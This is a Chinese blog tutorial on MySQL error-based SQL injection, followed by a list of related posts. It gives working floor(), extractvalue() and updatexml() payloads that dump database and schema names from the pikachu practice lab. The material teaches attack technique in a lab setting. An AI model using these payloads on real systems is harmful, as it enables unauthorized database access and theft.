SQL注入-报错注入

已于 2022-02-09 22:37:53 修改
阅读量9.9k 收藏 49
点赞数 5
分类专栏: SQL注入 文章标签: sql database 网络安全 mysql
于 2022-02-09 18:38:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/122846028
版权

目录

一、报错注入的定义

二、利用报错注入的前提

三、报错注入的优缺点

四、构造报错注入的基本步骤

五、常见的报错注入函数

六、报错注入演示(只演示前三个)

 1.利用floor()函数进行报错注入

 (1)获取当前数据库库名 :

 2.利用extractvalue()函数进行报错注入

(1)获取当前数据库库名 

(2)获取所有的数据库库名

(3)使用substr()函数截取所有的数据

3.利用updatexml()函数进行报错注入         

(1)获取当前数据库库名

(2)获取所有数据库库名

一、报错注入的定义

报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。

二、利用报错注入的前提

1.页面上没有显示位,但是必须有SQL语句执行错误的信息。

三、报错注入的优缺点

1.优点:不需要显示位,如果有显示位建议使用union联合查询。

2.缺点:需要有SQL语句的报错信息。

四、构造报错注入的基本步骤

  1. 构造目标查询语句;
  2. 选择报错注入函数;
  3. 构造报错注入语句;
  4. 拼接报错注入语句;

五、常见的报错注入函数

  1. floor();
  2. extractvalue();
  3. updatexml();
  4. geometrycollection();
  5. multipoint();
  6. polygon();
  7. multipolygon();
  8. linestring();
  9. multilinestring();
  10. exp();

六、报错注入演示(只演示前三个)

 1.利用floor()函数进行报错注入

主要报错原因为:count()+rand()+group_by()导致主键重复。

因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。

 (1)获取当前数据库库名 :

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'union select 1,count(*) from information_schema.tables group by concat(0x7e,database(),0x7e,floor(rand(0)*2))--+&submit=æ¥è¯¢

查询结果:

 2.利用extractvalue()函数进行报错注入

extractvalue()函数为MYSQL对XML文档数据进行查询的XPATH函数。

语法: extractValue(xml_document, xpath_string);

第一个参数:XML_document是String格式,为XML文档对象的名称,

第二个参数:XPath_string (Xpath格式的字符串);

Xpath定位必须是有效的,否则则会发生错误;所以可以在这个位置植入表达式,做执行后报错

!注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用(可以使用substr());

(1)获取当前数据库库名 

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select database())))--+&submit=æ¥è¯¢

查询结果:

(2)获取所有的数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select group_concat(schema_name)from information_schema.schemata)))--+&submit=æ¥è¯¢

查询结果:

 由于extractvalue()函数一次性最大只返回32位,所以接下来可以使用substr()函数输入所有的数据

(3)使用substr()函数截取所有的数据

    http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and extractvalue(1,concat(1,(select substr((select group_concat(schema_name) from information_schema.schemata),1,20)))) --++&submit=æ¥è¯¢

查询结果:

3.利用updatexml()函数进行报错注入         

updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。

语法:UPDATEXML (xml_document, XPathstring, new_value)。

第一个参数:xml_document,文档名称。

第二个参数:XPathstring (Xpath格式的字符串),做内容定位。

第三个参数:new_value,String格式,替换查找到的符合条件的值。

 !注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用(可以使用substr());

(1)获取当前数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--++&submit=æ¥è¯¢

查询结果:

 !0x7e为“~”。

(2)获取所有数据库库名

http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--++&submit=æ¥è¯¢

 group_concat()函数表示将数据一次性输出。

查询结果:

 如果需要上边工具的小伙伴可以私信我

一句话木马
关注
  • 5
    点赞
  • 49
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
报错注入
qq_39298901的博客
02-17 673
一、简介 ​ 报错注入有12种,分别是:floor报错、ExtractValue报错、UpdateXml报错、NAME_CONST报错、join报错、exp报错、GeometryCollection报错、polygon报错、multipoint报错、multlinestring报错、multpolygon报错、linestring报错。本文将探究基于floor的sql报错注入,介绍其原理及利用方法。 二、相关函数 ​ 在讲原理之前我们需要先了解一下相关sql语句以及几个sql函数的知识,然后对才能对原理理.
Sql注入-报错注入
最新发布
WolvenSec的博客
06-06 929
报错注入(Error-Based Injection)是一种通过引起数据库报错并从错误信息中提取有用信息的SQL注入攻击手法;攻击者利用数据库在处理异常情况时返回的错误消息,来推断出数据库结构、字段名甚至数据内容;这种攻击方法依赖于数据库将详细的错误消息返回给客户端。若在测试时发现网页会回显sql相关的报错信息,那么此时就可以尝试使用错误注入这种方式进行渗透。可以利用报错注入的前提:就是页面有错误信息显示出来、保证函数能够正确执行。
学习基于extractvalue()和updatexml()的报错注入
热门推荐
超人学飞的日子
06-09 5万+
extractvalue()extractvalue() :对XML文档进行查询的函数其实就是相当于我们熟悉的HTML文件中用 <div><p><a>标签查找元素一样语法:extractvalue(目标xml文档,xml路径)第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报...
sql注入知识---报错注入
尘玥的故事
04-03 286
1 、通过floor报错 , 注入语句如下: and select 1 from(select count() , concat(version() , floor(rand(0) 2)) x from information_schema . tables group by x) a);
SQL注入进阶:掌握联合查询注入和报错注入攻击技巧
weixin_43263566的博客
01-19 3299
SQL注入之联合查询注入与报错注入
SQL注入报错注入
qq_68163788的博客
01-27 1890
QL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入中注入恶意的SQL代码来执行未经授权的数据库操作。报错注入是一种SQL注入的类型,它利用数据库在执行恶意SQL语句时产生的错误消息来获取有关数据库结构和数据的信息。 假设有一个使用用户输入构建SQL查询的应用程序。攻击者可以通过在输入中注入恶意的SQL代码来触发数据库错误,并从错误消息中获取有关数据库的信息,如表名、列名等。这些信息可以帮助攻击者进一步利用数据库。
web-报错注入-皮卡丘靶场
07-15
防止报错注入的关键在于对用户输入进行严格的验证和过滤,避免在错误消息中泄露敏感信息,以及使用预编译的SQL语句(如参数化查询或存储过程),以减少SQL注入的风险。在进行渗透测试或安全训练时,皮卡丘靶场提供了...
第四节 基于报错的SQL注入-01
09-15
基于报错的SQL注入 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过在输入参数中inject恶意SQL代码来获取敏感数据或控制服务器。今天,我们将讨论基于报错的SQL注入,包括其分类、发现和利用方法。 SQL注入...
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
SQL注入-xiabee1
08-03
1.1 安装靶场 1.2 手工注入 1.2.1 联合查询注入 1.2.2 报错注入 1.3 源码审计
sqlserver注入
qq_49714982的博客
02-20 1274
cmd登录mssql:osql -S 127.0.0.1 -U sa -P 134679258qaZ@使用数据库:use test查询语句:select * from users查询所有数据库:select name from sysdatabases查看当前数据库所有的表:select name from sysobjects。
sql注入报错注入
2401_82760239的博客
04-02 1255
报错注入就是利用率数据库的某些机制,人为的制造错误条件,使得查询结果能够出现在错误的信息中。
SQL注入报错注入(小白的学习)
lgsyydsa的博客
06-04 381
报错注入适用于无法判断显示位 但页面会根据我们输入错误的SQL语法而报错,所以可以尝试报错注入。作为小白,这里就用ctfhub的题来写点东西,写的不好勿喷。点开题目链接,可以发现只有ID的输入,所以尝试输入数字型和字符型的判断语句,发现?这两个函数都是当第二个参数包含特殊字符时,数据库会报错,并将第二个参数的内容显示在报错内容中,这就是报错注入的原理。结果得到表名flag,news,根据判断,flag八成在flag这张表里。结果发现报错内容中第二个参数中有‘~’,说明方向是对的。别的报错函数一样的道理。
MYSQL 通过ExtractValue()报错注入
Ciyaso的博客
01-18 4025
函数解释: extractvalue():从目标XML中返回包含所查询值的字符串。   EXTRACTVALUE (XML_document, XPath_string);   第一个参数:XML_document是String格式,为XML文档对象的名称   第二个参数:XPath_string (Xpath格式的字符串)   concat:返回结果为连接参数产生的字符串。 报错原理 例如:SELECT ExtractValue('<a><b><b/></a&gt
SQL报错注入
qq_64332865的博客
02-18 588
基于报错的注入,是指通过构造特定的SQL语句,让攻击者想要查询的信息(如数据库名、版本号、用户名等)通过页面的错误提示回显出来。 报错注入一般需要具备两个前提条件:(1)Web应用程序未关闭数据库报错函数,对于一些SQL语句的错误直接回显在页面上;(2)后台未对一些具有报错功能的函数进行过滤。 常用的报错功能函数包括extractvalue()、 updatexml)、floor()、exp()等。 关于floor()函数,在进行报错注入时,floor()函数一般需要与rand()、count()、g
SQL注入之报错型注入
qq_43348375的博客
04-01 512
sql注入报错注入
MYSQL ExtractValue、UpdateXml报错注入详解
AaronLuo
08-26 2540
MYSQL Extractvalue 报错注入 Extractvalue() 函数 使用XPath表示法从XML字符串中提取值 参数 xml_frag, xpath_expr xml_frag: 目标xml文档 xpath_expr: 利用Xpath路径法表示的查找路径 报错原理:Xpath格式语法书写错误的话,就会报错 例如 SELECT extractvalue('<a&gt...
mysql 报错注入语句,MySQL报错注入函数汇总及常用注入语句
weixin_42349005的博客
03-17 229
版权声明:本文转载自网络内容,下面附原创链接原创链接:https://blog.csdn.net/Auuuuuuuu/article/details/91415165常用函数字符串连接函数,将多个字符串连接成一个字符串,当中间字符串有一个为空时,最后结果也为空concat(str1, str2, str3 ,...) concat_ws('指定分隔符', str1,str2,str3...)开头...
sql注入updatexml报错注入
06-08
SQL注入是一种常见的安全漏洞,其中updatexml是一种常用的注入方式之一。如果你在使用updatexml时遇到了报错,可能是由于以下原因: 1. SQL语句中的updatexml函数使用不正确,参数数量或类型不匹配,导致SQL语句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值